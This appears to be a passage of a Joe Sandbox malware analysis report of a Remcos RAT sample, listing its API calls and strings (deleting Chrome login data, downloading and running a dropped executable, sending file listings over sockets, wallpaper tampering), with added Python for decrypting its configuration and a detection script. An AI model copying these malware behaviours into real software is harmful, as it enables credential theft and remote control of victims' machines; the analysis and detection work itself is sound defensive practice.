                                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                              • String ID: !D@$PowrProf.dll$SetSuspendState
                                                              • API String ID: 1589313981-2876530381
                                                              • Opcode ID: ee499d4d47afde6cc3500bc760edfd9f3d73b5503f1d67301f657f5df503f6e6
                                                              • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                              • Opcode Fuzzy Hash: ee499d4d47afde6cc3500bc760edfd9f3d73b5503f1d67301f657f5df503f6e6
                                                              • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                              APIs
                                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                              • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                              • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                              Strings
                                                              • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Internet$CloseHandleOpen$FileRead
                                                              • String ID: http://geoplugin.net/json.gp
                                                              • API String ID: 3121278467-91888290
                                                              • Opcode ID: b01590e2803785cbe291e15456c0bc7acaef33a62877e88be574051367ac5976
                                                              • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                              • Opcode Fuzzy Hash: b01590e2803785cbe291e15456c0bc7acaef33a62877e88be574051367ac5976
                                                              • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                              APIs
                                                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                              • GetLastError.KERNEL32 ref: 0040BA93
                                                              Strings
                                                              • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                              • UserProfile, xrefs: 0040BA59
                                                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                              • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteErrorFileLast
                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                              • API String ID: 2018770650-1062637481
                                                              • Opcode ID: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                                              • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                              • Opcode Fuzzy Hash: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                                              • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                              • GetLastError.KERNEL32 ref: 004179D8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                              • String ID: SeShutdownPrivilege
                                                              • API String ID: 3534403312-3733053543
                                                              • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                              • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                              • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                              • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00409293
                                                                • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                              • FindClose.KERNEL32(00000000), ref: 004093FC
                                                                • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                                                • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                                                                • Part of subcall function 00404E26: CloseHandle.KERNELBASE(?), ref: 00404E4C
                                                              • FindClose.KERNEL32(00000000), ref: 004095F4
                                                                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                                                • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                              • String ID:
                                                              • API String ID: 1824512719-0
                                                              • Opcode ID: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                                              • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                              • Opcode Fuzzy Hash: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                                              • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FSE$FSE$PkGNG
                                                              • API String ID: 0-1266307253
                                                              • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                              • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                                              • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                              • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                                              APIs
                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                              • String ID:
                                                              • API String ID: 276877138-0
                                                              • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                                              • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                              • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                                              • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                              APIs
                                                                • Part of subcall function 00413584: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 004135A4
                                                                • Part of subcall function 00413584: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004135C2
                                                                • Part of subcall function 00413584: RegCloseKey.ADVAPI32(00000000), ref: 004135CD
                                                              • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                              • ExitProcess.KERNEL32 ref: 0040F905
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                              • String ID: 5.1.3 Pro$override$pth_unenc
                                                              • API String ID: 2281282204-1392497409
                                                              • Opcode ID: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                                              • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                              • Opcode Fuzzy Hash: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                                              • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                              • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID: ACP$OCP
                                                              • API String ID: 2299586839-711371036
                                                              • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                              • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                              • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                              • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                              APIs
                                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                                              • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                              • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                              • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID: SETTINGS
                                                              • API String ID: 3473537107-594951305
                                                              • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                              • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                              • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                              • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
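The function above loads a resource named "SETTINGS" of type 0x0A (RT_RCDATA) via FindResourceA / LoadResource / LockResource / SizeofResource; in Remcos builds this resource carries the encrypted RAT configuration that the "Found malware configuration" verdict is derived from. The following extractor is an added example written for this report (it is not code from the sample, from Joe Sandbox, or from the Remcos author) and makes two labelled assumptions: the widely documented Remcos resource layout (one byte of key length, the RC4 key, then RC4-encrypted configuration) and the field delimiter b"|\x1e\x1f|" with a first field of ";"-separated host:port:password entries. The resource blob it parses is constructed here so the script runs offline; on a real sample the same bytes would be read from the RCDATA entry named SETTINGS (for instance with pefile).

```python
"""Decrypt a Remcos-style 'SETTINGS' resource blob into configuration fields.

Added example for this report (not code from the sample or Joe Sandbox).
Assumptions, as labelled in the lead-in:
  - layout: [key_len:1][rc4_key:key_len][rc4(config)]
  - field delimiter b"|\x1e\x1f|"; first field = "host:port:password;..." C2 list
The fixture below is constructed, not extracted from the real sample.
"""
from typing import List


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Symmetric: the same call encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:  # pseudo-random generation, XORed with the data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


SEPARATOR = b"|\x1e\x1f|"  # assumed Remcos field delimiter


def parse_settings_resource(blob: bytes) -> List[bytes]:
    """Split a raw SETTINGS resource into decrypted configuration fields."""
    if not blob:
        raise ValueError("empty resource")
    key_len = blob[0]
    # Need the length byte, the key and at least one ciphertext byte.
    if key_len == 0 or len(blob) < 1 + key_len + 1:
        raise ValueError("resource too short for declared key length")
    key = blob[1:1 + key_len]
    plaintext = rc4(key, blob[1 + key_len:])
    return plaintext.split(SEPARATOR)


def extract_c2(fields: List[bytes]) -> List[str]:
    """Return host:port pairs from the assumed first (C2 list) field."""
    hosts = []
    for entry in fields[0].split(b";"):
        parts = entry.split(b":")
        if len(parts) >= 2 and parts[0]:
            host = parts[0].decode("ascii", errors="replace")
            port = parts[1].decode("ascii", errors="replace")
            hosts.append(f"{host}:{port}")
    return hosts


def build_sample_resource(key: bytes, fields: List[bytes]) -> bytes:
    """Constructed fixture in the assumed layout, so the script runs offline."""
    return bytes([len(key)]) + key + rc4(key, SEPARATOR.join(fields))


# Constructed configuration: hostnames use the reserved .invalid TLD; the last
# field reuses the dropped-file name seen in this report purely as sample text.
SAMPLE_RESOURCE = build_sample_resource(
    b"examplekey",
    [
        b"c2.example.invalid:2404:1;backup.example.invalid:8080:1",
        b"RemoteHost",
        b"mXJeXQoaGktJCW.exe",
    ],
)

if __name__ == "__main__":
    fields = parse_settings_resource(SAMPLE_RESOURCE)
    for index, field in enumerate(fields):
        print(index, field)
    print("C2:", extract_c2(fields))
```

The length guard matters on real samples: a packed or partially dumped resource with a key-length byte larger than the remaining data would otherwise yield an empty key and a silent, wrong decryption, so the parser refuses it instead.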
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 004096A5
                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstH_prologNext
                                                              • String ID:
                                                              • API String ID: 1157919129-0
                                                              • Opcode ID: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                                              • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                              • Opcode Fuzzy Hash: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                                              • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0040884C
                                                              • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                              • String ID:
                                                              • API String ID: 1771804793-0
                                                              • Opcode ID: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                              • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                              • Opcode Fuzzy Hash: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                              • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                              APIs
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DownloadExecuteFileShell
                                                              • String ID: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe$open
                                                              • API String ID: 2825088817-1584553696
                                                              • Opcode ID: 25f93c1eb8c7c2b3408b92261e90d72d92bad6cdb28d287bebca9ae006ad5217
                                                              • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                              • Opcode Fuzzy Hash: 25f93c1eb8c7c2b3408b92261e90d72d92bad6cdb28d287bebca9ae006ad5217
                                                              • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileFind$FirstNextsend
                                                              • String ID: XPG$XPG
                                                              • API String ID: 4113138495-1962359302
                                                              • Opcode ID: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                                              • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                              • Opcode Fuzzy Hash: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                                              • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                                • Part of subcall function 004137AA: RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                                                • Part of subcall function 004137AA: RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                              • API String ID: 4127273184-3576401099
                                                              • Opcode ID: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                                              • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                              • Opcode Fuzzy Hash: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                                              • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
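Two of the functions above leave host artefacts that a detection engineer can key on: the download-and-run routine (URLDownloadToFileW to C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe followed by ShellExecuteW with the "open" verb) and the wallpaper routine, which writes WallpaperStyle and TileWallpaper under HKCU\Control Panel\Desktop and then calls SystemParametersInfoW(0x14, 0, NULL, 3), that is SPI_SETDESKWALLPAPER with SPIF_UPDATEINIFILE | SPIF_SENDWININICHANGE. The triage script below is an added example for this report, not code from Joe Sandbox, the sample, or any Sigma rule; it runs three rules over constructed Sysmon-shaped events (EventID 1 process create, 11 file create, 13 registry value set). The event dictionaries, the field names, the parent "sample.exe" path and the allowlist of processes that legitimately change the wallpaper are all assumptions.

```python
"""Triage constructed Sysmon-shaped events for the behaviours in this report.

Added example (not Joe Sandbox, sample, or Sigma code). Assumed event shape:
  EventID 1  : Image, ParentImage            (process create)
  EventID 11 : Image, TargetFilename         (file create)
  EventID 13 : Image, TargetObject, Details  (registry value set)
The allowlist and every event below are constructed for this example.
"""
import re
from typing import Dict, List, Tuple

# Processes that are expected to rewrite wallpaper settings (assumed allowlist).
TRUSTED_WALLPAPER_WRITERS = {
    r"c:\windows\explorer.exe",
    r"c:\windows\immersivecontrolpanel\systemsettings.exe",
}

# Values the report shows the sample touching under Control Panel\Desktop.
WALLPAPER_VALUES = re.compile(
    r"\\control panel\\desktop\\(wallpaper|wallpaperstyle|tilewallpaper)$", re.I
)

# An .exe dropped directly in %APPDATA%\Roaming (the report's drop location).
APPDATA_ROOT_EXE = re.compile(
    r"^c:\\users\\[^\\]+\\appdata\\roaming\\[^\\]+\.exe$", re.I
)

Finding = Tuple[str, str]


def triage(events: List[Dict]) -> List[Finding]:
    """Return (rule, detail) findings; correlates drop -> execute in order."""
    findings: List[Finding] = []
    dropped: set = set()  # lower-cased paths written into %APPDATA%\Roaming
    for ev in events:
        eid = ev.get("EventID")
        image = ev.get("Image", "")
        if eid == 11:
            target = ev.get("TargetFilename", "")
            if APPDATA_ROOT_EXE.match(target):
                dropped.add(target.lower())
                findings.append(("drop_in_appdata", f"{image} wrote {target}"))
        elif eid == 1:
            # Fires only for a process whose image was dropped earlier in the stream.
            if image.lower() in dropped:
                parent = ev.get("ParentImage", "?")
                findings.append(("dropped_file_executed", f"{image} started by {parent}"))
        elif eid == 13:
            target = ev.get("TargetObject", "")
            if WALLPAPER_VALUES.search(target) and image.lower() not in TRUSTED_WALLPAPER_WRITERS:
                findings.append(("wallpaper_tamper", f"{image} set {target} = {ev.get('Details', '?')}"))
    return findings


# Constructed event stream: one benign wallpaper write, the drop/execute chain
# from the report, two wallpaper writes by the dropped file, one benign launch.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Control Panel\Desktop\WallpaperStyle", "Details": "10"},
    {"EventID": 11, "Image": r"C:\Users\user\Desktop\sample.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"},
    {"EventID": 1, "Image": r"C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe",
     "ParentImage": r"C:\Users\user\Desktop\sample.exe"},
    {"EventID": 13, "Image": r"C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Control Panel\Desktop\WallpaperStyle", "Details": "0"},
    {"EventID": 13, "Image": r"C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Control Panel\Desktop\TileWallpaper", "Details": "0"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

The drop-then-execute rule is deliberately stateful: a process start from %APPDATA%\Roaming alone is noisy on real fleets (several legitimate installers live there), but a start of a file the same stream just saw written there is the ShellExecuteW("open") step recorded in this report. The SystemParametersInfoW call itself is not visible to registry telemetry, so the registry writes and the process performing them are what the rule keys on.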
                                                              APIs
                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                              • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                                              • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                              • String ID:
                                                              • API String ID: 4212172061-0
                                                              • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                              • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                              • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                              • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                              APIs
